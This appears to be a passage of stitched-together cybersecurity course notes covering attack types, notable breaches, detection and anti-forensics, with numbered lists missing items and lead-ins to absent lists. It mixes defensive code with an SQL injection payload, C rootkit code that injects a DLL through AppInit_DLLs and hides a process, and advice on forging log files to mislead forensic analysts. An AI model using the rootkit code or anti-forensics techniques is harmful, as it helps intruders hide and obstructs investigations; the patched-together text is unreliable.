permission, using network forensics tools must be in line with the
legislation of a particular jurisdiction. Permission can be granted by a
Computer Security Incident Response Team (CSIRT) but a warrant is
often required.
Unit 5
1. Attacks
a) Computer attacks
What is a cyber attack?
A cyber attack is any attempt to gain unauthorized access to a computer, computing
system or computer network with the intent to cause damage. Cyber attacks aim to
disable, disrupt, destroy or control computer systems or to alter, block, delete, manipulate
or steal the data held within these systems.
Any individual or group can launch a cyber attack from anywhere, using any of
various attack strategies.
People who carry out cyber attacks are generally regarded as cybercriminals. Often
referred to as bad actors, threat actors and hackers, they include individuals who act
alone, drawing on their computer skills to design and execute malicious attacks. They can
also belong to a criminal syndicate, working with other threat actors to find weaknesses
or problems in the computer systems -- called vulnerabilities -- that they can exploit for
criminal gain.
Financial gain. Cybercriminals launch most cyber attacks, especially those against
commercial entities, for financial gain. These attacks often aim to steal sensitive data,
such as customer credit card numbers or employee personal information, which the
cybercriminals then use to access money or goods using the victims' identities.
Other financially motivated attacks are designed to disable computer systems, with
cybercriminals locking computers so owners and authorized users cannot access the
applications or data they need; attackers then demand that the targeted organizations pay
them ransoms to unlock the computer systems.
Still, other attacks aim to gain valuable corporate data, such as propriety information;
these types of cyber attacks are a modern, computerized form of corporate espionage.
Disruption and revenge. Bad actors also launch attacks specifically to sow chaos,
confusion, discontent, frustration or mistrust. They could be taking such action as a way
to get revenge for acts taken against them. They could be aiming to publicly embarrass
the attacked entities or to damage the organizations' reputations. These attacks are often
directed at government entities but can also hit commercial entities or nonprofit
organizations.
Insider threats are attacks that come from employees with malicious intent.
Cyberwarfare. Governments around the world are also involved in cyber attacks, with
many national governments acknowledging or suspected of designing and executing
attacks against other countries as part of ongoing political, economic and social disputes.
These types of attacks are classified as cyberwarfare.
In an untargeted attack, where the bad actors are trying to break into as many devices or
systems as possible, they generally look for vulnerabilities in software code that will
enable them to gain access without being detected or blocked. Or, they might employ
a phishing attack, emailing large numbers of people with socially engineered messages
crafted to entice recipients to click a link that will download malicious code.
In a targeted attack, the threat actors are going after a specific organization, and the
methods used vary depending on the attack's objectives. The hacktivist group
Anonymous, for example, was suspected in a 2020 distributed denial-of-service (DDoS)
attack on the Minneapolis Police Department website after a Black man died while being
arrested by Minneapolis officers. Hackers also use spear-phishing campaigns in a
targeted attack, crafting emails to specific individuals who, if they click included links,
would download malicious software designed to subvert the organization's technology or
the sensitive data it holds.
Cyber criminals often create the software tools to use in their attacks, and they frequently
share those on the so-called dark web.
Cyber attacks often happen in stages, starting with hackers surveying or scanning for
vulnerabilities or access points, initiating the initial compromise and then executing the
full attack -- whether it's stealing valuable data, disabling the computer systems or both.
In fact, most organizations take months to identify an attack underway and then contain
it. According to the "2022 Cost of a Data Breach" report from IBM, organizations with
fully deployed artificial intelligence and automation security tools took an average of 181
days to identify a data breach and another 68 days to contain it, for a total of 249 days.
Organizations with partially deployed AI and automation took a total of 299 days to
identify and contain a breach, while those without AI and automation took an average of
235 days to identify a breach and another 88 days to contain it, for a total of 323 days.
2. Phishing occurs when hackers socially engineer email messages to entice recipients
to open them. The messages trick recipients into downloading the malware within
the email by either opening an attached file or embedded link. The "2022 State of
the Phish" report from cybersecurity and compliance company Proofpoint found
that 83% of survey respondents said their organization experienced at least one
successful phishing attack in 2021, up 46% over 2020. Moreover, the survey also
revealed that 78% of organizations saw an email-based ransomware attack in 2021.
6. SQL injection occurs when hackers insert malicious code into servers using
Structured Query Language (SQL) to get the server to reveal
sensitive data.
7. Zero-day exploit happens when hackers first exploit a newly identified vulnerability
in IT infrastructure. For example, a series of critical vulnerabilities in a widely used
piece of open source software, the Apache Log4j Project, was reported in December
2021, with the news sending security teams at organizations worldwide scrambling
to address them.
10. Credential-based attacks happen when hackers steal the credentials that IT workers
use to access and manage systems and then use that information to illegally access
computers to steal sensitive data or otherwise disrupt an organization and its
operations.
11. Credential stuffing takes place when attackers use compromised login credentials
(such as an email and password) to gain access to other systems.
12. Brute-force attacks happen when hackers employ trial-and-error methods to crack
login credentials such as usernames, passwords and encryption keys, hoping that
multiple attempts pay off with a right guess.
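
Defenders often detect brute-force and credential-stuffing attempts by counting failed logins per source within a time window. A minimal Python sketch over an assumed event schema:

from collections import defaultdict

# Each event: (timestamp_seconds, source_ip, username, success_flag) — assumed schema.
events = [
    (0, "203.0.113.9", "alice", False),
    (2, "203.0.113.9", "alice", False),
    (4, "203.0.113.9", "alice", False),
    (6, "203.0.113.9", "alice", True),   # success after a burst of failures
]

WINDOW, THRESHOLD = 60, 3
failures = defaultdict(list)

for ts, ip, user, ok in events:
    if not ok:
        failures[ip].append(ts)
        failures[ip] = [t for t in failures[ip] if ts - t <= WINDOW]
        if len(failures[ip]) >= THRESHOLD:
            print(f"ALERT: {len(failures[ip])} failed logins from {ip} within {WINDOW}s")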
How can you prevent a cyber attack?
There is no guaranteed way for any organization to prevent a cyber attack, but there are
numerous cybersecurity best practices that organizations can follow to reduce the risk.
Reducing the risk of a cyber attack relies on using a combination of skilled security
professionals, processes and technology.
[Figure omitted: tips for security professionals and employees on how to improve cybersecurity.]
What are the most well-known cyber attacks?
Cyber attacks have continued to increase in sophistication and have had significant
impacts beyond just the companies involved.
Among the most impactful recent attacks: hackers hit Colonial Pipeline in May 2021 with
a ransomware attack. The attack shut down the largest fuel pipeline in the United States,
leading to fuel shortages along the East Coast.
Several months before that, the massive SolarWinds attack breached U.S. federal
agencies, infrastructure and private corporations in what is believed to be among the
worst cyberespionage attacks inflicted on the U.S. On Dec. 13, 2020, Austin-based IT
management software company SolarWinds was hit by a supply chain attack that
compromised updates for its Orion software platform. As part of this attack, threat actors
inserted their own malware, now known as Sunburst or Solorigate, into the updates,
which were distributed to many SolarWinds customers.
The first confirmed victim of this backdoor was cybersecurity firm FireEye, which
disclosed on Dec. 8 that it was breached by suspected nation-state hackers. It was soon
revealed that SolarWinds attacks affected other organizations, including tech giants
Microsoft and VMware, as well as many U.S. government agencies. Investigations
showed that the hackers -- believed to be sponsored by the Russian government -- had
been infiltrating targeted systems undetected since March 2020.
Here is a rundown of some of the most notorious breaches, dating back to 2009:
a July 2020 attack on Twitter, in which hackers were able to access the Twitter
accounts of high-profile users;
the Feb. 2018 breach at Under Armour's MyFitnessPal (Under Armour has since sold
MyFitnessPal), which exposed email addresses and login information for 150 million
user accounts;
the May 2017 WannaCry ransomware attack, which hit more than 300,000
computers across various industries in 150 nations, causing billions of dollars of
damage;
the September 2017 Equifax breach, which saw the personal information of 145
million individuals compromised;
the Petya attacks in 2016, which were followed by the NotPetya attacks of 2017,
which hit targets around the world, causing more than $10 billion in damage;
another 2016 attack, this time at FriendFinder, which said more than 20 years' worth
of data belonging to 412 million users was compromised;
a data breach at Yahoo in 2016 that exposed personal information contained within
500 million user accounts, which was then followed by news of another attack that
compromised 1 billion user accounts;
eBay's May 2014 announcement that hackers used employee credentials to collect
personal information on its 145 million users;
the 2013 breach suffered by Target Corp., in which the data belonging to 110 million
customers was stolen; and
the Heartland Payment Systems data breach, announced in January 2009, in which
information on 134 million credit cards was exposed.
Cyber attack trends
The volume, cost and impact of cyber attacks continue to grow each year, according to
multiple reports.
Consider the figures from one 2022 report. The "Cybersecurity Solutions for a Riskier
World" report from ThoughtLab noted that the number of material breaches suffered by
surveyed organizations jumped 20.5% from 2020 to 2021. Yet, despite executives and
board members paying more attention -- and spending more -- on cybersecurity than ever
before, 29% of CEOs and CISOs and 40% of chief security officers said their
organization is unprepared for the ever-evolving threat landscape.
The report further notes that security experts expect the volume of attacks to continue
their climb.
The types of cyber attacks, as well as their sophistication, also grew during the first two
decades of the 21st century -- particularly during the COVID pandemic when, starting in
early 2020, organizations enabled remote work en masse and exposed a host of potential
attack vectors in the process.
Consider, for example, the growing number and type of attack vectors -- that is, the
method or pathway that malicious code uses to infect systems -- over the years.
The first virus was invented in 1986, although it wasn't intended to corrupt data in the
infected systems. Cornell University graduate student Robert Tappan Morris created the
first worm distributed through the internet, called the Morris worm, in 1988.
Then came Trojan horses, ransomware and DDoS attacks, which became more destructive
and notorious with names such as WannaCry, Petya and NotPetya -- all ransomware
attack vectors.
Hackers also adopted more sophisticated technologies throughout the first decades of the
21st century, using machine learning and artificial intelligence, as well as bots and other
robotic tools, to increase the velocity and volume of their attacks.
And they developed more sophisticated phishing and spear-phishing campaigns, even as
they continued to go after unpatched vulnerabilities; compromised credentials, including
passwords; and misconfigurations to gain unauthorized access to computer systems.
b) Network attacks
Network attacks are unauthorized actions on the digital assets within an organizational
network. Malicious parties usually execute network attacks to alter, destroy, or steal
private data. Perpetrators in network attacks tend to target network perimeters to gain
access to internal systems.
There are two main types of network attacks: passive and active. In passive network
attacks, malicious parties gain unauthorized access to networks, monitor, and steal
private data without making any alterations. Active network attacks involve modifying,
encrypting, or damaging data.
Upon infiltration, malicious parties may leverage other hacking activities, such as
malware and endpoint attacks, to attack an organizational network. With more
organizations adopting remote working, networks have become more vulnerable to data
theft and destruction.
Modern organizations rely on the internet for communication, and confidential data is
often exchanged between networks. Remote accessibility also provides malicious
parties with vulnerable targets for data interception. These may violate user privacy
settings and compromise devices connected to the internet.
Network attacks occur in various forms. Enterprises need to ensure that they maintain
the highest cybersecurity standards, network security policies, and staff training to
safeguard their assets against increasingly sophisticated cyber threats.
DDoS
Man-in-the-middle Attacks
Unauthorized Access
Unauthorized access refers to network attacks where malicious parties gain access to
enterprise assets without seeking permission. Such incidents may occur due to weak
account password protection, unencrypted networks, insider threats that abuse role
privileges, and the exploitation of inactive roles with administrator rights.
Organizations should prioritize and maintain the least privilege principle to avoid the
risks of privilege escalation and unauthorized access.
SQL Injection
Unmoderated user data inputs could place organizational networks at risk of SQL
injection attacks. In this attack method, external parties manipulate forms
by submitting malicious code in place of expected data values. They compromise the
network and access sensitive data such as user passwords.
There are various SQL injection types, such as examining databases to retrieve details
on their version and structure and subverting logic on the application layer, disrupting its
logic sequences and function.
Network users can reduce the risks of SQL injection attacks by implementing
parameterized queries/prepared statements, which helps verify untrusted data inputs.
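
The contrast is easy to demonstrate. In the Python sketch below (using an in-memory SQLite database built for the example), string concatenation lets a classic payload rewrite the query, while a parameterized query binds the same payload as a harmless literal:

import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")

user_input = "' OR '1'='1"  # a classic injection payload

# VULNERABLE: string concatenation lets the payload rewrite the query logic.
vulnerable = f"SELECT * FROM users WHERE name = '{user_input}'"
print(conn.execute(vulnerable).fetchall())   # returns every row

# SAFE: the placeholder binds the payload as a literal value, never as SQL.
safe = "SELECT * FROM users WHERE name = ?"
print(conn.execute(safe, (user_input,)).fetchall())  # returns nothing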
Network attacks remain a lingering issue for organizations as they transition to remote
operations with increased reliance on confidential network communications. Recent
network attacks demonstrate that malicious parties may strike at the least expected
moment. So, cyber vigilance and security should be a priority across all industries.
Advanced Persistent Threats (APTs)
Some network attacks may involve advanced persistent threats (APTs) from a team of
expert hackers. APT parties will prepare and deploy a complex program of cyber attacks.
This exploits multiple network vulnerabilities while remaining undetected by network
security measures such as firewalls and antivirus software.
Ransomware
In ransomware attacks, malicious parties encrypt data access channels while
withholding decryption keys, a model that enables hackers to extort affected
organizations. Payment channels usually include untraceable cryptocurrency accounts.
While cybersecurity authorities discourage paying off malicious parties, some
organizations continue to do so as a quick solution in regaining data access.
A next-generation firewall (NGFW) with a real-time monitoring interface enables users
to react quickly to the slightest network anomalies, with a clear breakdown of ongoing
processes. An NGFW prioritizes critical networks and devices while identifying the most
evasive network attacks that bypass conventional firewalls.
c) System attacks
Many approaches exist to gain access to a system; these constitute the different types
of attacks on a system. One common requirement for all such approaches is that the
attacker finds and exploits a system's weakness or vulnerability.
Today’s Operating Systems (OS) are loaded with features and are increasingly complex.
While users take advantage of these features, they are prone to more vulnerabilities,
thus enticing attackers. Operating systems run many services such as graphical user
interfaces (GUIs) that support applications and system tools, and enable Internet access.
Extensive tweaking is required to lock them down. Attackers constantly look for OS
vulnerabilities that allow them to exploit and gain access to a target system or network.
To stop attackers from compromising the network, the system or network
administrators must keep abreast of various new exploits and methods adopted by
attackers, and monitor the networks regularly.
2. Misconfiguration Attacks
3. Application-Level Attacks
Software developers are often under intense pressure to meet deadlines, which can
mean they do not have sufficient time to completely test their products before shipping
them, leaving undiscovered security holes. This is particularly troublesome in newer
software applications that come with a large number of features and functionalities,
making them more and more complex. An increase in the complexity means more
opportunities for vulnerabilities. Attackers find and exploit these vulnerabilities in the
applications using different tools and techniques to gain unauthorized access and steal
or manipulate data.
Security is not always a high priority to software developers, and they handle it as an
“add-on” component after release. This means that not all instances of the software will
have the same level of security. Error checking in these applications can be very poor (or
even nonexistent), which leads to:
Software developers often use free libraries and code licensed from other sources in
their programs to reduce development time and cost. This means that large portions of
many pieces of software will be the same, and if an attacker discovers vulnerabilities in
that code, many pieces of software are at risk.
Attackers exploit default configuration and settings of the off-the-shelf libraries and
code. The problem is that software developers leave the libraries and code unchanged.
They need to customize and fine-tune every part of their code in order to make it not
only more secure, but different enough so that the same exploit will not work.
An attack can be active or passive. An “active attack” attempts to alter system resources or affect
their operation. A “passive attack” attempts to learn or make use of information from the system
but does not affect system resources (e.g., wiretapping).
A MitM attack occurs when a hacker inserts itself between the communications of a
client and a server. Here are some common types of man-in-the-middle attacks:
Session hijacking
In this type of MitM attack, an attacker hijacks a session between a trusted client and
a network server. The attacking computer substitutes its IP address for that of the
trusted client while the server continues the session, believing it is communicating
with the client. For example, the attack might unfold like this:
1. A client connects to a server.
2. The attacker's computer gains control of the client.
3. The attacker's computer disconnects the client from the server.
4. The attacker's computer replaces the client's IP address with its own IP address and
spoofs the client's sequence numbers.
5. The attacker's computer continues the dialog with the server, and the server
believes it is still communicating with the client.
IP Spoofing
Replay
A replay attack occurs when an attacker intercepts and saves old messages and then tries to
send them later, impersonating one of the participants. This type can be easily
countered with session timestamps or a nonce (a random number or a string that changes
with time).
So, how can you confirm that P's public key belongs to P and not to A? Certificate
authorities and hash functions were created to solve this problem. When person 2 (P2)
wants to send a message to P, and P wants to be sure that A won't read or modify the
message and that the message actually came from P2, the following method must be used:
1. P2 creates a symmetric key and encrypts it with P's public key.
2. P2 sends the encrypted symmetric key to P.
3. P2 computes a hash function of the message and digitally signs it.
4. P2 encrypts his message and the message's signed hash using the symmetric
key and sends the whole thing to P.
5. P is able to receive the symmetric key from P2 because only he has the private key to
decrypt the encryption.
6. P, and only P, can decrypt the symmetrically encrypted message and signed hash
because he has the symmetric key.
7. P is able to verify that the message has not been altered because he can compute the
hash of the received message and compare it with the digitally signed one.
8. P is also able to convince himself that P2 was the sender because only P2 can
sign the hash so that it verifies with P2's public key.
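
As an illustration only, the steps above can be sketched with the Python "cryptography" package (assumed installed); certificate handling and key distribution are omitted:

# A minimal sketch of the protocol above. The sign() call hashes the
# message internally, so the signature covers the message hash (step 3).
from cryptography.hazmat.primitives.asymmetric import rsa, padding
from cryptography.hazmat.primitives import hashes
from cryptography.fernet import Fernet

p_key  = rsa.generate_private_key(public_exponent=65537, key_size=2048)  # P's key pair
p2_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)  # P2's key pair

message = b"meet at noon"

# Steps 1-2: P2 creates a symmetric key and encrypts it with P's public key.
sym_key = Fernet.generate_key()
enc_key = p_key.public_key().encrypt(
    sym_key,
    padding.OAEP(mgf=padding.MGF1(hashes.SHA256()), algorithm=hashes.SHA256(), label=None),
)

# Step 3: P2 signs the message hash.
signature = p2_key.sign(
    message,
    padding.PSS(mgf=padding.MGF1(hashes.SHA256()), salt_length=padding.PSS.MAX_LENGTH),
    hashes.SHA256(),
)

# Step 4: P2 encrypts message + signature under the symmetric key.
ciphertext = Fernet(sym_key).encrypt(message + b"||" + signature)

# Steps 5-7: only P can recover the symmetric key, then the message.
recovered_key = p_key.decrypt(
    enc_key,
    padding.OAEP(mgf=padding.MGF1(hashes.SHA256()), algorithm=hashes.SHA256(), label=None),
)
plaintext, _, sig = Fernet(recovered_key).decrypt(ciphertext).partition(b"||")

# Step 8: the signature verifies only with P2's public key (raises if tampered).
p2_key.public_key().verify(
    sig,
    plaintext,
    padding.PSS(mgf=padding.MGF1(hashes.SHA256()), salt_length=padding.PSS.MAX_LENGTH),
    hashes.SHA256(),
)
print("Message authenticated:", plaintext)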
A phishing attack is the practice of sending emails that appear to be from trusted
sources with the goal of gaining personal information or influencing users to do
something. It combines social engineering and technical trickery. It could involve an
attachment to an email that loads malware onto your computer. It could also be a link
to an illegitimate website that can trick you into downloading malware or handing
over your personal information.
Spear phishing is a very targeted type of phishing activity. Attackers take the time
to conduct research into targets and create messages that are personal and relevant.
Because of this, spear phishing can be very hard to spot and even harder to defend
against. One of the simplest ways in which a hacker can conduct a spear phishing attack
is email spoofing, which is when the information in the “From” section of the email is
falsified, making it appear as if it is coming from someone you know, such as your
management or your partner company. Another technique that scammers use to add
credibility to their story is website cloning — they copy legitimate websites to fool you
into entering personally identifiable information (PII) or login credentials.
Critical thinking — don't accept that an email is the real deal just because you're
busy or stressed, or because you have 150 other unread messages in your inbox. Stop for
a moment and analyze the email.
Hovering over the links — move your mouse over the link, but don't click it! Just let your
mouse cursor hover over the link and see where it would actually take you. Apply critical
thinking to decipher the URL.
Analyzing email headers — email headers define how an email got to your address. The
“Reply-to” and “Return-Path” parameters should lead to the same domain as is stated
in the email (see the sketch after this list).
Sandboxing — you can test email content in a sandbox environment, logging activity
from opening the attachment or clicking the links inside the email.
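
The header check mentioned above can be automated. A minimal Python sketch using the standard-library email module, with a fabricated example message:

from email import message_from_string
from email.utils import parseaddr

raw = """From: CEO <ceo@example.com>
Reply-To: payments@evil.example
Return-Path: <bounce@evil.example>
Subject: Urgent wire transfer

Please pay the attached invoice today.
"""

msg = message_from_string(raw)

def domain(header):
    addr = parseaddr(msg.get(header, ""))[1]
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else None

from_dom = domain("From")
for h in ("Reply-To", "Return-Path"):
    d = domain(h)
    if d and d != from_dom:
        print(f"Warning: {h} domain {d!r} differs from From domain {from_dom!r}")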
7. Drive-by attack
Drive-by download attacks are a common method of spreading malware. Hackers search
for insecure websites and plant a malicious script into the HTTP or PHP code on one of
the pages. This script might install malware directly onto the computer of somebody who
visits the site, or it might redirect the victim to a site controlled by the hackers. Drive-by
downloads can happen when visiting a website or viewing an email message or a pop-
up window. Unlike many other types of cyber security attacks, a drive-by doesn't rely on
a user to do anything to actively enable the attack — you don't need to click a
download button or open a malicious email attachment to become infected. A drive-by
download can take advantage of an app, operating system or web browser that contains
security flaws due to failed updates or a lack of updates.
To protect yourself from drive-by attacks, you need to keep your browsers and
operating systems up to date and avoid websites that might contain malicious code.
Stick to the sites you normally use — although keep in mind that even these sites can
be hacked. Don't keep too many unnecessary programs and apps on your device. The
more plug-ins you have, the more vulnerabilities there are that can be exploited by
drive-by attacks.
Threat detection and response is the practice of identifying any malicious activity
that could compromise the network and then composing a proper response to
mitigate or neutralize the threat before it can exploit any present vulnerabilities.
Detecting Threats
Threats that have been seen before, and for which signatures or indicators exist, are
considered "known" threats. However, there are additional "unknown" threats that an
organization aims to detect. This means the organization hasn't encountered them
before, perhaps because the attacker is using new methods or technologies.
Known threats can sometimes slip past even the best defensive measures, which is
why most security organizations actively look for both known and unknown threats
in their environment. So how can an organization try to detect both known and
unknown threats?
Unknown threats are those that haven't been identified in the wild (or are ever-
changing), but threat intelligence suggests that threat actors are targeting a swath
of vulnerable assets, weak credentials, or a specific industry vertical. User behavior
analytics (UBA) are invaluable in helping to quickly identify anomalous behavior -
possibly indicating an unknown threat - across your network. UBA tools establish a
baseline for what is "normal" in a given environment, then leverage analytics (or in
some cases, machine learning) to determine and alert when behavior is straying
from that baseline.
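
At its simplest, baselining can be a statistical outlier test. The toy Python sketch below (assumed metric and threshold; real UBA tools use far richer models) flags a value that strays too far from the historical baseline:

import statistics

# Assumed toy metric: megabytes a user uploads per day.
baseline = [12, 9, 15, 11, 10, 13, 14, 12, 11, 10]   # "normal" history
today = 240                                          # observed value

mean = statistics.mean(baseline)
stdev = statistics.stdev(baseline)
z = (today - mean) / stdev

if abs(z) > 3:   # a common rule of thumb, not a universal setting
    print(f"Anomaly: today's value {today} is {z:.1f} standard deviations from baseline")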
Attacker behavior analytics (ABA) can expose the various tactics, techniques, and
procedures (TTPs) by which attackers can gain access to your corporate network.
TTPs include things like malware, cryptojacking (using your assets to mine
cryptocurrency), and confidential data exfiltration.
During a breach, every moment an attacker is undetected is time for them to tunnel
further into your environment. A combination of UBA and ABA offers a great
starting point to ensure your security operations center (SOC) is alerted to potential
threats as early as possible in the attack chain.
A great incident response plan and playbook minimizes the impact of a breach and
ensures things run smoothly, even in a stressful breach scenario. If you're just
getting started, some important considerations include:
Defining roles and duties for handling incidents: These responsibilities, including
contact information and backups, should be documented in a readily accessible
channel.
Considering who to loop in: Think beyond IT and security teams to document which
cross-functional or third-party stakeholders – such as legal, PR, your board, or
customers – should be looped in and when. Knowing who owns these various
communications and how they should be executed will help ensure responses run
smoothly and expectations are met along the way.
Security event threat detection technology to aggregate data from events across the
network, including authentication, network access, and logs from critical systems.
Network threat detection technology to understand traffic patterns on the network
and monitor network traffic, as well as to the internet.
Endpoint threat detection technology to provide detailed information about possibly
malicious events on user machines, as well as any behavioral or forensic information to
aid in investigating threats.
Penetration tests, in addition to other preventative controls, to understand detection
telemetry and coordinate a response.
A Proactive Threat Detection Program
To add a bit more to the element of telemetry and being proactive in threat
response, it’s important to understand there is no single solution. Instead, a
combination of tools acts as a net across the entirety of an organization's attack
surface, from end to end, to try and capture threats before they become serious
problems.
Some targets are just too tempting for an attacker to pass up. Security teams know
this, so they set traps in hopes that an attacker will take the bait. Within the context
of an organization's network, an intruder trap could include a honeypot target that
may seem to house network services that are especially appealing to an attacker, or
“honey credentials” that appear to have the user privileges an attacker would need in
order to gain access to sensitive systems or data.
When an attacker goes after this bait, it triggers an alert so the security team knows
there is suspicious activity in the network that they should investigate.
Threat Hunting
Instead of waiting for a threat to appear in the organization's network, a threat hunt
enables security analysts to actively go out into their own network, endpoints, and
security technology to look for threats or attackers that may be lurking as-yet
undetected. This is an advanced technique generally performed by veteran security
and threat analysts.
Anti-forensics – Part 1
Data Forgery
Analysis Prevention
Online Anonymity
Note that not all anti-forensic methods are covered by this document,
due to space reasons or because some are very easy to detect. Details
on some of these techniques have been deliberately omitted, always
for space reasons and because of the large amount of information
already present online.
Most hard drives reserve some space at the beginning for the MBR
(Master Boot Record). This contains the code needed to begin
loading an OS and also contains the partition tables. The MBR
defines the location and size of each partition, up to a maximum of four.
The MBR requires only a single sector. Between it and the first partition
we can find 62 unused sectors (sector no. 63 is considered the start of
cylinder 1, where, for a classic DOS-style partition table, the first
partition needs to start). Those unused sectors are an obvious place to hide data.
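
A DOS-style partition table is easy to inspect programmatically. The Python sketch below parses the four partition entries from the first sector of a raw disk image (hypothetical file name):

import struct

# Read the first sector (512 bytes) from a raw disk image.
with open("disk.img", "rb") as f:
    mbr = f.read(512)

assert mbr[510:512] == b"\x55\xaa", "Missing MBR boot signature"

# The four 16-byte partition entries start at offset 446.
for i in range(4):
    entry = mbr[446 + i * 16 : 446 + (i + 1) * 16]
    boot_flag, ptype = entry[0], entry[4]
    lba_start, num_sectors = struct.unpack_from("<II", entry, 8)
    if ptype != 0:
        print(f"Partition {i + 1}: type=0x{ptype:02x} "
              f"start_lba={lba_start} sectors={num_sectors} "
              f"{'(bootable)' if boot_flag == 0x80 else ''}")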
HPA Area
The HPA (Host Protected Area) is a region at the end of a disk that is hidden
from the operating system and most software. It can be created and resized
with the ATA command SET MAX ADDRESS, and so can be abused to conceal data.
DCO area
The most effective way to detect DCO areas remains the use of the ATA
command DEVICE CONFIGURATION IDENTIFY, which is able to show
the real size of a disk. Comparing the output of this command with that
resulting from the command READ_NATIVE_MAX_ADDRESS makes it
easy to find any hidden areas. It's also important to note that “The ATA
Forensic Tool” is also able to find hidden areas of this kind.
“Slack space,” in a nutshell, is the unused space between the end
of a stored file and the end of a given data unit, also known as a cluster
or block. When a file is written to the disk and it doesn't occupy the
entire cluster, the remaining space is called slack space. It's very
easy to imagine that this space can be used to store secret
information.
[Figure omitted: a graphical representation of how slack space appears within a cluster.]
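
File slack is straightforward to quantify when the cluster size is known. A minimal Python sketch (assumed 4 KB clusters and a hypothetical file; inspecting the slack bytes themselves would require raw access to the volume):

import os

CLUSTER = 4096  # assumed cluster (allocation unit) size in bytes

def slack_bytes(path):
    """Bytes between the file's end and the end of its last cluster."""
    size = os.path.getsize(path)
    used = -(-size // CLUSTER) * CLUSTER   # size rounded up to a whole cluster
    return used - size

print(slack_bytes("example.txt"), "bytes of slack")  # hypothetical file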
For example, consider the 8-bit binary number 11111111 (1 byte): the
right-most 1-bit is considered the least significant because it’s one
that, if changed, has the least effect on the value of this number.
Given a carrier image, therefore, the idea is to break
down the binary format of the message and put it in the LSBs of each
pixel of the image. Steganography, obviously, may be used with many
types of file formats, such as audio, video, binary and text. Other
steganographic techniques that should surely be mentioned are the
Bit-Plane Complexity Segmentation (BPCS), the Chaos Based Spread
Spectrum Image Steganography (CSSIS) and Permutation
Steganography (PS). Going into the details of all steganographic
algorithms however, is beyond the scope of this document and should
be dealt with through a dedicated paper.
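
For illustration, a naive LSB embed/extract can be sketched in a few lines of Python with the Pillow imaging library (assumed installed); the file names are hypothetical, and a lossless format is required so the LSBs survive saving:

from PIL import Image

def embed(cover_path, out_path, message):
    """Hide a short ASCII message in the red-channel LSBs of an image."""
    bits = "".join(f"{b:08b}" for b in (message + "\0").encode())  # NUL terminator
    img = Image.open(cover_path).convert("RGB")
    pixels = list(img.getdata())
    assert len(bits) <= len(pixels), "Message too long for this cover image"
    out = []
    for i, (r, g, b) in enumerate(pixels):
        if i < len(bits):
            r = (r & ~1) | int(bits[i])    # overwrite the red LSB
        out.append((r, g, b))
    img.putdata(out)
    img.save(out_path, "PNG")              # lossless format preserves the LSBs

def extract(stego_path):
    img = Image.open(stego_path).convert("RGB")
    bits = "".join(str(r & 1) for r, g, b in img.getdata())
    data = bytes(int(bits[i:i + 8], 2) for i in range(0, len(bits) - 7, 8))
    return data.split(b"\0", 1)[0].decode()

embed("cover.png", "stego.png", "secret")  # hypothetical file names
print(extract("stego.png"))                # -> "secret"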
Encryption
Using a good hex editor, however, it's possible to modify this string
with something random or misleading. Because of the large amount of
information available about both the tools and symmetric cryptographic
algorithms, these will not be discussed in detail in this document. But,
generally, it is very important to always preserve reasonable doubt about
the use of cryptographic algorithms within our systems, specifically
to prevent an analyst from being able to prove the presence of an
encrypted area.
Rootkits
Rootkits are often used to mask files, directories, registry keys and
active processes, and lend themselves to in-depth considerations.
They are, of course, effective only in the course of a live analysis of
the system under investigation.
Usually, we can divide them into two main categories, closely related
to the area in which they work: UserSpace Rootkit (Ring 3)
and KernelSpace Rootkit (Ring 0). Because they are able to alter the
resulting output of standard system function calls, they can,
consequently, also alter the results of forensics tools.
For example, a user-space rootkit DLL can be registered for injection into every
process that loads user32.dll via the AppInit_DLLs registry value:

RegOpenKeyEx(HKEY_LOCAL_MACHINE,
             "Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows",
             0, KEY_SET_VALUE, &hKey);
GetWindowsDirectory(PATH_SISTEMA, sizeof(PATH_SISTEMA));
strcat_s(PATH_SISTEMA, "\\my_rootkit_library.dll");
RegSetValueEx(hKey, "AppInit_DLLs", 0, REG_SZ,
              (const unsigned char *)PATH_SISTEMA, sizeof(PATH_SISTEMA));
Next, this is the main code of our custom prepared DLL to hide a
specific process in our system through the use of the Mhook library:
do
{
    pCurrent = pNext;
    pNext = (PMY_SYSTEM_PROCESS_INFORMATION)((PUCHAR)pCurrent +
            pCurrent->NextEntryOffset);

    /* If the next entry belongs to the process we want to hide,
       unlink it so callers of the hooked API never see it. */
    if (pNext->ImageName.Buffer &&
        wcscmp(pNext->ImageName.Buffer, L"notepad.exe") == 0)
    {
        if (pNext->NextEntryOffset == 0)
            pCurrent->NextEntryOffset = 0;
        else
            pCurrent->NextEntryOffset += pNext->NextEntryOffset;
        pNext = pCurrent;
    }
}
while (pCurrent->NextEntryOffset != 0);
Once the value of the registry key is modified, the result is that the
process “notepad.exe” will no longer be shown in software like Task
Manager or Process Explorer.
Often, however, for more complex threats that are usually created in a
customized manner, these may not be sufficient. By simultaneously using
different rootkit techniques in user space and kernel space, it is possible
to modify an operating system so deeply that the detection algorithms of
common anti-rootkit tools fail to find such hidden active processes. For
example, a custom and powerful rootkit (the details of which will not be
discussed in this document) can alter the final “Process List” output of
GMER, a well-known anti-rootkit tool, while the rootkit hides the process
“cmd.exe”.
Data Forgery
Even in this case, the technique relies on the fact that if information
cannot be identified, it cannot be analyzed.
Transmogrification
There are many packers and encryptors available for this purpose, but
most of them are easily identifiable and, usually, it is very easy to
recover the code protected through them. In contrast, a custom
“homemade” packer definitely adds a new level of security in this
sense, as it will almost certainly require the assistance of a
specialized software reverse engineer (increasing the cost and time of
analysis) to analyze it in depth.
Of course, each key will not be stored in the clear in our program (even if
compressed), but will be generated at runtime from an initial value of
our choosing. To conclude, it's important to know that, because sooner or
later our program will have to run, this software protection should be
considered a temporary analysis countermeasure: a good reverser will still
be able to get back to the original protected instructions.
It’s important to note that not all file systems record the same
information about these parameters and not all operating systems
take advantage of the opportunity given by the file system to record
this information.
Log files
There's not much to say about log files. Every computer
professional knows of their existence and the ease with which they
can be altered. Specifically, to obstruct a forensic analysis, log
files can be altered in order to insert dummy, misleading or malformed
data. They can also simply be destroyed. However, the latter is
not recommended, because a forensic analyst expects to find some
data if he goes looking for it in a specific place, and, if he doesn't
find it, will immediately suspect that some manipulation is in place,
which of course could also be demonstrated. The best way to deal
with log files is to allow the analyst to find what he is looking for, while
of course making sure that he will see what we want him to see.
